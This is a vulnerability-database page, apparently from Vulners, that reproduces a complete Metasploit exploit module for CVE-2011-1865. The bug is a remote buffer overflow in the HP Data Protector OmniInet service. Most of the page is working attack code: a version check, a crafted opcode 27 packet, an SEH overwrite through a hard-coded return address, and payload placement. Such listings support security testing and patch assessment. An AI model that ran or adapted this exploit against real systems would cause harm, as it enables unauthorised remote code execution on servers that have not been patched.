Lucene search
K

HP OmniInet.exe Opcode 27 Buffer Overflow

🗓️ 01 Jul 2011 17:07:38Reported by MC <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 21 Views

HP OmniInet.exe Buffer Overflow in HP Data Protecto

Related
Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'HP OmniInet.exe Opcode 27 Buffer Overflow',
      'Description'    => %q{
          This module exploits a buffer overflow in the Hewlett-Packard
        OmniInet NT Service. By sending a specially crafted opcode 27 packet,
        a remote attacker may be able to execute arbitrary code.
      },
      'Author'         => [ 'MC' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2011-1865' ],
          [ 'OSVDB', '73571'],
          [ 'URL', 'http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities' ],
        ],
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'seh',
        },
      'Payload' =>
        {
          'Space'    => 800,
          'BadChars' => "\x00",
          'StackAdjustment' => -3500
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'HP Data Protector A.06.10 Build 611 / A.06.11 Build 243',
            {
              #POP/POP/RET from OmniBack\bin\MSVCR71.dll
              'Ret' => 0x7c35630d
            }
          ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2011-06-29'))

    register_options([Opt::RPORT(5555)])
  end

  def check

    connect
    sock.put(rand_text_alpha_upper(64))
    resp = sock.get_once(-1,5)
    disconnect

    if (resp)
      resp = resp.unpack('v*').pack('C*')
      print_status("Received response: " + resp)

      # extract version
      if (resp =~ /HP Data Protector/)
        version = resp.split[3]
      elsif (resp =~ /HP OpenView Storage Data Protector/)
        version = resp.split[5]
      elsif (resp =~ /HP StorageWorks Application Recovery Manager/)
        version = resp.split[5]
      else
        return Exploit::CheckCode::Detected
      end

      version = version.split('.')
      major = version[1].to_i
      minor = version[2].to_i
      if ((major < 6) or (major == 6 and minor < 11))
        return Exploit::CheckCode::Appears
      end

      if ((major > 6) or (major == 6 and minor >= 11))
        return Exploit::CheckCode::Safe
      end

    end
    return Exploit::CheckCode::Safe

  end

  def exploit

    connect

    trigger = rand_text_alpha_upper(10000)
    trigger[4552, payload.encoded.length] = payload.encoded
    trigger[5352, 8] = generate_seh_record(target.ret)
    trigger[5360, 5] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-788").encode_string

    opcode = "27"

    packet = Rex::Text.to_unicode("\x00")
    packet << "\x27\xca" #length
    packet << "\xff\xfe\x32"
    packet << "\x00\x00\x00"
    packet << Rex::Text.to_unicode("\x20\x61\x00") * 3
    packet << Rex::Text.to_unicode("\x20")
    packet << trigger
    packet << Rex::Text.to_unicode("\x00")
    packet << Rex::Text.to_unicode("\x20\x61\x00")
    packet << Rex::Text.to_unicode("\x20" + opcode + "\x00")
    packet << Rex::Text.to_unicode("\x20\x61\x00") * 24

    print_status("Trying #{target.name}...")
    sock.put(packet)

    select(nil,nil,nil,10)
    handler
    disconnect

  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Oct 2020 20:00Current
1.2Low risk
Vulners AI Score1.2
CVSS 210
EPSS0.88948
21